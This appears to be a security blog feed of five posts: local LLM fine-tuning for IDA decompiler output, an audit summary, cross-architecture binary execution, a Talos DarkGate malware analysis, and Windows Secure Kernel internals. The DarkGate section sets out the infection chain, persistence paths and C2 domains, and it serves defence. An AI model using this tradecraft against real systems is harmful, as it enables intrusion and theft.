# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches perfectly - the somewhat surprising result is that function comment is better at 50 steps compared to 100 steps.

Zooming out a bit and comparing further steps, the format is perfect while the most common error seen is confusion on what gets returned (value vs allocated memory) or inconsistent numeric format (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, failing into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old, what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we tried our best with our small model, we can move on and just use GPT4, just not in the way you would expect. Going back and considering the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, while so far we have used our small 7b parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replace our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, its straight forward to use the API and execute the same original instruction generation we previously had done:

I originally had no expectations related to the cost of this process, to be safe I added 50$ to my account before executing the previous step, I was surprised when it only cost ~16$ at the time:

Seeing that it only cost 16$ for the initial run and the quality of the responses were good, I figured why not use both sets of data and get 2x the high-quality instruction datasets?

With the brand-new high-quality dataset complete we can back up and start a new fine tune of our mistral-7b model, in this case it has been trained for 200 steps taking snapshots every 50 steps. After training is complete, an evaluation was done against a new input that is not in either dataset against our old 'low-quality' fine tune and our new one.

At 50 steps the new GPT4 trained version has already performed much better at capturing variables to rename, interestingly the LLM trained dataset description contains more direct references to the code while the GPT4 description is slightly higher level:

At 100 steps the variable names for the GPT4 trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM trained model has picked up the extra variable renames, but they look to be in line with what the GPT4 trained model had at 50 steps. I also thought it was interesting that the LLM trained model refers to [2] as the third field (mathematically correct):

At 150 steps the GPT4 trained model has slightly improved the function description while maintaining the variable renames. The LLM trained model has improved the function name to match the GPT4 trained model at 50 steps, while losing variable renames - interestingly it now refers to [2] as the second element now:

Finally, at 200 steps the GPT4 trained model has slightly tweaked its description. The LLM trained model has rediscovered its variable renames from the 100 steps version and also refined how it references the [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly......

That response looks like something we have seen already, at this point I would say we have proven it is feasible to fine tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

https://github.com/JusticeRage/Gepetto
https://github.com/mrphrazer/reverser_ai
https://github.com/mahaloz/DAILA
sorry if I forgot yours, nothing personal :)

I decided to write my own simple version, apologies in advance for any errors or poor design decisions, the underlying fine-tuned model is available to use with whatever you like best. Building off the previous simple python script shown earlier, I again choose to use Ollama's rest service instead of loading the model directly - I like this design for few reasons:

minimal Python requirements
the service can be running on a remote machine with more compute
reload/maintenance/update will not interrupt your weeks long IDA session
avoids tying IDA up with a large memory footprint, that one you have had running for weeks now :)

To set up Ollama to use the new model, download the weights and Modelfile in the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model, if you have other models loaded within your Ollama service they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and return a dialog when it is complete:

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is whenever the plugin is activated, it will identify any references within the code that is being analyzed and retrieve any comments that exist at the target locations and include them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:

For this example, the WDT_ICR register location is queried for any comments, if one exists it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and is part of the 'base knowledge' stored within the original trained weights and would have be identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that considers the additional knowledge that was provided by the IDB:

Currently, this functionality does not extract this information from comments that may be defined at the start of a function; while that would be useful and give context to the current analysis as to what a called function does, this would often result the inclusion of a large number of extra tokens potentially exhausting the underlying models context window and return low quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune a LLM for local usage; whether that is making a better version of the one we are sharing or something completely different. It is also worth noting most of this project was executed earlier this year (feb/march), since then a handful of new models have been released that would be interesting to explore/adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Public Report – Keyfork Implementation Review

NCC Group Research

R.Rivera

6 June 2024 at 15:28

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low impact findings were uncovered, each of which were promptly addressed by Distrust.

NCC_Group_Distrust_Keyfork_Public_Report_2024-06-04_v1.0 Download

Cross-Execute Your Linux Binaries, Don’t Cross-Compile Them

NCC Group Research

Domen Puncer Kugler

5 June 2024 at 14:32

Lolbins? Where we’re going, we don’t need lolbins.

At NCC Group, as a consultant in our hardware and embedded systems practice¹, I often get to play with various devices, which is always fun, but getting your own software to run on them can be a bit of a pain.
This article documents a few realisations and tricks that make my life easier. There is nothing new about anything mentioned here, but there is also hardly anything written about these (ab)use cases.

The challenges we are looking to solve are:

Running standard Linux tools on your embedded device
Compiling your own tools to run on the embedded device
Running binaries from the embedded device on your PC

This can often be achieved by cross-compiling and/or statically compiling the target binary. It is very much a valid approach, but it can also be time-consuming, even when you’re seasoned at this sort of thing. So, the approach described here does not do that.

Taking the dependency libraries with you

The realisation is that while dynamically linked binaries need some of the environment, it is actually not that hard to figure out what that environment is and to copy it over to the system where you want to run the binary.

Consider the example of running strace from an arm64 Raspberry Pi on an arm64 Android phone.

Just copying won’t work, since Android differs too much from common Linux distributions:

pi@rpi:~ $ adb push `which strace` /data/local/tmp
/usr/bin/strace: 1 file pushed, 0 skipped. 16.0 MB/s (1640712 bytes in 0.098s)
pi@rpi:~ $ adb exec-out /data/local/tmp/strace -ttewrite /bin/echo X
/system/bin/sh: /data/local/tmp/strace: No such file or directory
pi@rpi:~ $ adb exec-out ldd /data/local/tmp/strace 
    linux-vdso.so.1 => [vdso] (0x73edb38000)
CANNOT LINK EXECUTABLE "linker64": library "libc.so.6" not found: needed by main executable

We can list the dependencies. strace depends on the dynamic linker, libraries and often on some special bits like VDSO.

pi@rpi:~ $ ldd `which strace`
    linux-vdso.so.1 (0x0000007faf464000)
    libc.so.6 => /lib/aarch64-linux-gnu/libc.so.6 (0x0000007faf0b0000)
    /lib/ld-linux-aarch64.so.1 (0x0000007faf427000)

We can copy the dependencies and use the appropriate dynamic linker to load them (the first highlighted bit enumerates the dependencies):

pi@rpi:~ $ bin=`which strace`; adb push $bin $(ldd $bin | sed -nre 's/^[^/]*(\/.*) \(0x.*\)$/\1/p') /data/local/tmp/
/usr/bin/strace: 1 file pushed, 0 skipped. 19.4 MB/s (1640712 bytes in 0.081s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 23.7 MB/s (1651472 bytes in 0.067s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 18.6 MB/s (202904 bytes in 0.010s)
3 files pushed, 0 skipped. 19.0 MB/s (3495088 bytes in 0.176s)
pi@rpi:~ $ adb exec-out /data/local/tmp/ld-linux-aarch64.so.1 --library-path /data/local/tmp/ /data/local/tmp/strace -ttewrite /bin/echo X
10:36:27.842717 write(1, "X\n", 2X
)      = 2
10:36:27.845895 +++ exited with 0 +++

There, perfect, we have strace on our device now, and it only took two ugly one-liners.

Installing that odd architecture on your PC

My preferred way of setting up a cross architecture Linux chroot is using debootstrap and schroot. This assumes you are using a distribution from a Debian family (I do see there’s debootstrap for Fedora as well, haven’t tried it though).

Logan Chien posted this nice and short guide², which basically boils down to following three sections:

Setting up the tools

kali@kali:~$ apt install debootstrap qemu-user-static schroot

Installing a base system

kali@kali:~$ sudo debootstrap --arch=arm64 bookworm ~/chroots/arm64-test
...
I: Base system installed successfully.

This takes a minute or two and installs a base Debian Bookworm system for arm64. The distribution names come from Debian (http://ftp.debian.org/debian/dists/) or Ubuntu (http://archive.ubuntu.com/ubuntu/dists/). For the architecture names navigate into subfolders (for example http://ftp.debian.org/debian/dists/bookworm/main/). If you need a less common architecture try the testing channel, which supports riscv64 for example.

Setting up schroot

kali@kali:~$ echo "[arm64-test] 
directory=$HOME/chroots/arm64-test
users=$(whoami)
root-users=$(whoami)
type=directory" | sudo tee /etc/schroot/chroot.d/arm64-test

Now you can enter the chroot:

kali@kali:~$ schroot -c arm64-test
(arm64-test)kali@kali:~$ uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) aarch64 GNU/Linux
(arm64-test)kali@kali:~$ logout
kali@kali:~$ schroot -c arm64-test -u root
(arm64-test)root@kali:/home/kali# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)

Finish

So, here you have it. Install the wanted binary, and copy it to your target device like we did before from Raspberry Pi.

(arm64-test)kali@kali:~$ # sudo apt install strace adb
...
(arm64-test)kali@kali:~$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
(arm64-test)kali@kali:~$ for i in $(bindeps `which strace`); do adb push $i /data/local/tmp/; done
/usr/bin/strace: 1 file pushed, 0 skipped. 13.3 MB/s (1640712 bytes in 0.117s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 14.0 MB/s (1651472 bytes in 0.113s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 7.4 MB/s (202904 bytes in 0.026s)
(arm64-test)kali@kali:~$ adb shell
sargo:/ $ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
sargo:/ $ xrun strace -tte write /bin/echo X
16:31:59.159266 write(1, "X\n", 2X ) = 2 16:31:59.163322 +++ exited with 0 +++

Cross-compiling without cross-compiling

Well, now you have a full Linux distribution of your chosen architecture running, so you can just compile any special tools. Sure, it is emulated through QEMU under the hood, but for anything smallish one does not even notice the performance hit.

And you have avoided dealing with a toolchain to cross-compile for that one-off task.

Running the device’s binaries on your PC

In the above examples the binary we wished to run was copied onto the target device. Occasionally, one wants to do the reverse, run the binary from the device locally on your PC.

The exact same approach should work, and for anything non-trivial I would recommend a custom setup chroot, so you can easily place the required files in the correct locations (and it is also easy to later delete it all).

For a simple tool though, one can get away by using QEMU:

kali@kali:~/android_test$ adb exec-out 'bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }; bindeps `which dexdump`' | xargs -n1 adb pull
/apex/com.android.art/bin/dexdump: 1 file pulled, 0 skipped. 11.6 MB/s (108744 bytes in 0.009s)
/apex/com.android.art/lib64/libdexfile.so: 1 file pulled, 0 skipped. 4.7 MB/s (347040 bytes in 0.070s)
/apex/com.android.art/lib64/libartpalette.so: 1 file pulled, 0 skipped. 2.0 MB/s (14896 bytes in 0.007s)
/apex/com.android.art/lib64/libbase.so: 1 file pulled, 0 skipped. 13.3 MB/s (251152 bytes in 0.018s)
/apex/com.android.art/lib64/libartbase.so: 1 file pulled, 0 skipped. 20.8 MB/s (497272 bytes in 0.023s)
/apex/com.android.art/lib64/libc++.so: 1 file pulled, 0 skipped. 8.1 MB/s (671496 bytes in 0.079s)
/apex/com.android.art/lib64/libziparchive.so: 1 file pulled, 0 skipped. 1.2 MB/s (79752 bytes in 0.066s)
/apex/com.android.runtime/lib64/bionic/libc.so: 1 file pulled, 0 skipped. 26.1 MB/s (1013048 bytes in 0.037s)
/apex/com.android.runtime/lib64/bionic/libdl.so: 1 file pulled, 0 skipped. 2.0 MB/s (13728 bytes in 0.006s)
/apex/com.android.runtime/lib64/bionic/libm.so: 1 file pulled, 0 skipped. 12.7 MB/s (221072 bytes in 0.017s)
/system/lib64/libz.so: 1 file pulled, 0 skipped. 6.5 MB/s (98016 bytes in 0.014s)
/system/lib64/liblog.so: 1 file pulled, 0 skipped. 5.8 MB/s (62176 bytes in 0.010s)
/system/lib64/libc++.so: 1 file pulled, 0 skipped. 25.7 MB/s (700400 bytes in 0.026s)
kali@kali:~/android_test$ adb pull /system/bin/linker64
/system/bin/linker64: 1 file pulled, 0 skipped. 13.1 MB/s (1802728 bytes in 0.131s)
kali@kali:~/android_test$ qemu-arm64 -E LD_LIBRARY_PATH=$PWD ./linker64 $PWD/dexdump
linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
WARNING: linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:126] No file specified
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] Copyright (C) 2007 The Android Open Source Project
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] 
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:42] dexdump: [-a] [-c] [-d] [-e] [-f] [-h] [-i] [-j] [-l layout] [-n]  [-o outfile] dexfile...
...

With the dynamic linker, dependency libraries and the target binary, we can use qemu-user to run our binary.

The observant reader will notice this differs slightly from the way ld was invoked before. It appears Android’s dynamic linker doesn’t support an argument to specify library path, so we have used LD_LIBRARY_PATH (in the first example above, we could have invoked strace this way as well: LD_LIBRRAY_PATH=/data/local/tmp /data/local/tmp/ld-linux-aarch64.so.1 /data/local/tmp/strace).

Epilogue

I hope you found this useful.

Helper functions

The list of dependencies that are to be copied along with the binary can be generated with:

$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
$ bindeps `which strace`

The binary can then be run on the target device with (Note the path will need adjusting and possibly linker arguments as well):

$ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
$ xrun strace -tte write /bin/echo X

DarkGate switches up its tactics with new payload, email templates

Cisco Talos

5 June 2024 at 12:00

DarkGate switches up its tactics with new payload, email templates

This post was authored by Kalpesh Mantri.

Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infected the victim's system with the DarkGate malware.
These campaigns, active since the second week of March, leverage tactics, techniques, and procedures (TTPs) that we have not previously observed in DarkGate attacks.
These campaigns rely on a technique called “Remote Template Injection” to bypass email security controls and to deceive the user into downloading and executing malicious code when the Excel document is opened.
DarkGate has used AutoIT scripts as part of the infection process for a long time. However, in these campaigns, AutoHotKey scripting was used instead of AutoIT.
The final DarkGate payload is designed to execute in-memory, without ever being written to disk, running directly from within the AutoHotKey.exe process.

The DarkGate malware family is distinguished by its covert spreading techniques, ability to steal information, evasion strategies, and widespread impact on both individuals and organizations. Recently, DarkGate has been observed distributing malware through Microsoft Teams and even via malvertising campaigns. Notably, in the latest campaign, AutoHotKey scripting was employed instead of AutoIT, indicating the continuous evolution of DarkGate actors in altering the infection chain to evade detection.

Email campaigns

This research began when a considerable number of our clients reported receiving emails, each containing a Microsoft Excel file attachment that followed a distinct pattern in its naming convention.

Talos’ intent analysis of these emails revealed that the primary purpose of the emails primarily pertained to financial or official matters, compelling the recipient to take an action by opening the attached document.

This peculiar trend prompted us to conduct an in-depth investigation into this widespread malspam activity. Our initial findings linked the indicators of compromise (IOCs) to the DarkGate malware.

The table below includes some of the observed changes in attachment naming convention patterns over time.

Start Date	End Date	Format	Examples
March 12, 2024	March 19, 2024	march-D%-2024.xlsx	march-D5676-2024.xlsx march-D3230-2024.xlsx march-D2091-2024.xlsx
March 15, 2024	March 20, 2024	ACH-%March.xlsx	ACH-5101-15March.xlsx ACH-5392-15March.xlsx ACH-4619-15March.xlsx
March 18, 2024	March 19, 2024	attach#%-2024.xlsx	attach#4919-18-03-2024.xlsx attach#8517-18-03-2024.xlsx attach#4339-18-03-2024.xlsx
March 19, 2024	March 20, 2024	march19-D%-2024.xlsx	march19-D3175-2024.xlsx march19-D5648-2024.xlsx march19-D8858-2024.xlsx
March 26, 2024	March 26, 2024	re-march-26-2024-%.xls?	re-march-26-2024-4187.xlsx re-march-26-2024-7964.xlsx re-march-26-2024-4187.xls
April 3, 2024	April 5, 2024	april2024-%.xlsx	april2024-2032.xlsx april2024-3378.xlsx april2024-4268.xlsx
April 9, 2024	April 9, 2024	statapril2024-%.xlsx	statapril2024-9505.xlsx statapril2024-9518.xlsx statapril2024-9524.xlsx
April 10, 2024	April 10, 2024	4_10_AC-%.xlsx*	4_10_AC-1177.xlsx 4_10_AC-1288.xlsx 4_10_AC-1301.xlsx

*Variant redirecting to JavaScript file instead of VBS.

Victimology

Based on Cisco Talos telemetry, this campaign targets the U.S. the most often compared to other geographic regions.

Healthcare technologies and telecommunications were the most-targeted sectors, but campaign activity was observed targeting a wide range of industries.

Technical analysis

Our telemetry indicates that malspam emails were the primary source of delivery for this campaign. It is an active campaign using attached Excel documents attempting to lure users to download and execute remote payloads.

As shown below, the Excel spreadsheet has an embedded object with an external link to an attacker-controlled Server Message Block (SMB) file share.

The overall infection process associated with this campaign is shown below.

The infection process begins when the malicious Excel document is opened. These files were specially crafted to utilize a technique, called “Remote Template Injection,” to trigger the automatic download and execution of malicious contents hosted on a remote server.

Remote Template Injection is an attack technique that exploits a legitimate Excel functionality wherein templates can be imported from external sources to expand a document’s functions and features. By exploiting the inherent trust users place in document files, this method skilfully evades security protocols that may not be as stringent for document templates compared to executable files. It represents a refined tactic for attackers to establish a presence within a system, sidestepping the need for conventional executable malware.

When the Excel file is opened, it downloads and executes a VBS file from an attacker-controlled server.

The VBS file is appended with a command that executes a PowerShell script from the DarkGate command and control (C2) server.

This PowerShell script retrieves the next stage’s components and executes them, as shown below.

Payload analysis

On March 12, 2024, the DarkGate campaign transitioned from deploying AutoIT scripts to employing AutoHotKey scripts.

AutoIT and AutoHotKey are scripting languages designed for automating tasks on Windows. While both languages serve similar purposes, their differences lie in their syntax complexity, feature sets and community resources. AutoHotKey offers more advanced text manipulation features, extensive support for hotkeys, and a vast library of user-contributed scripts for various purposes. While both AutoIT and AutoHotKey have legitimate purposes, they are often abused by adversaries to run malicious scripts, consistent with other scripting languages often observed in infection chains.

As shown in the screenshot above, one of the files retrieved is ‘test.txt.’ Within this file, there is base64-encoded blob that, when decoded, transforms into binary data. This binary data is then processed to execute the DarkGate malware payload directly within memory on infected systems.

As shown in the previous PowerShell code, payloads are initially saved to disk within a directory (C:\rimz\) on the system. The directory name changes across infection chains that were analyzed.

In this case, the attacker was using a legitimate copy of the AutoHotKey binary (AutoHotKey.exe) to execute a malicious AHK script (script.ahk).

The executed AHK script reads content from the text file (test.txt), decodes it in memory, and executes it without ever saving the decoded DarkGate payload to disk. This file also contains shellcode that is loaded and executed by the AHK script, as shown below.

Persistence mechanisms

Components used during the final stage of the infection process are stored at the following directory location:

C:\ProgramData\cccddcb\AutoHotKey.exe
C:\ProgramData\cccddcb\hafbccc.ahk
C:\ProgramData\cccddcb\test.txt

Persistence across reboots is established through the creation of a shortcut file within the Startup directory on the infected system.

Shortcut Parameter	Value
Shortcut Location	C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DfAchhd.lnk
Shortcut Execution	C:\ProgramData\cccddcb\AutoHotkey.exe C:\ProgramData\cccddcb"C:\ProgramData\cccddcb\hafbccc.ahk

Talos’ threat intelligence and detection response teams have successfully developed detection for these campaigns and blocked them as appropriate on Cisco Secure products. However, because of the evolving nature of recent DarkGate campaigns — as demonstrated by the shift from AutoIT to AutoHotKey scripts and use of remote template injection — serves as a stark reminder of the continuous arms race in cybersecurity.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs apply to this threat:

Snort 2 SIDs: 3, 12, 11192, 13667, 15306, 16642, 19187, 23256, 23861, 44484, 44485, 44486, 44487, 44488, 63521, 63522, 63523, 63524
Snort 3 SIDs: 1, 16, 260, 11192, 15306, 36376, 44484, 44486, 44488, 63521, 63522, 63523, 63524

The following ClamAV detections are also available for this threat:

Doc.Malware.DarkGateDoc
Ps1.Malware.DarkGate-10030456-0
Vbs.Malware.DarkGate-10030520-0

Indicators of Compromise (IOCs)

Indicators of Compromise (IOCs) associated with this threat can be found here.

Below is an example of the configuration parameters extracted from one of the DarkGate payloads analyzed.

Configuration Parameter	Value
C2	hxxp://badbutperfect[.]com hxxp://withupdate[.]com hxxp://irreceiver[.]com hxxp://backupitfirst[.]com hxxp://goingupdate[.]com hxxp://buassinnndm[.]net
Family	DarkGate
Attributes	anti_analysis = true anti_debug = false anti_vm = true c2_port = 80 internal_mutex (Provides the XOR key/maker used for DarkGate payload decryption) = WZqqpfdY ping_interval = 60 startup_persistence = true username = admin

Windows Internals: Dissecting Secure Image Objects - Part 1

Connor McGarr

1 June 2024 at 00:00

Introduction

Recently I have been working on an un-published (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively-unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I maybe could just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, lack of user-defined types (UDTs) in the securekernel.exe symbols, and overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes with NAR/NTEs). This blog (and subsequent ones) are really just analysis posts outlining things such as Secure System Calls, functionality, the reverse engineering methodology I take, etc. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and mainly writing up my analysis for the sheer fact there isn’t too much information out there on these subjects and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and Secure Kernel to load images/share resources/etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions, and may differ from the actual terms as an example. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for other images other than drivers. We will be focusing on driver loads. With this said, I hope you enjoy!

`SECURE_IMAGE` Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at anytime on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example of this is when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the given sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as maybe the address of the entry point of the image, the number of PE sections, etc. - this is the sort of thing a Secure Image object can provide - which is much of the needed context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work at a high-level similarly to how a traditional system call works:

An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
The privileged component exposes an interface to the untrusted component
The untrusted component packs up information it wants to send to the privileged component
The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
The privileged component takes all of the information, verifies it, and acts on it

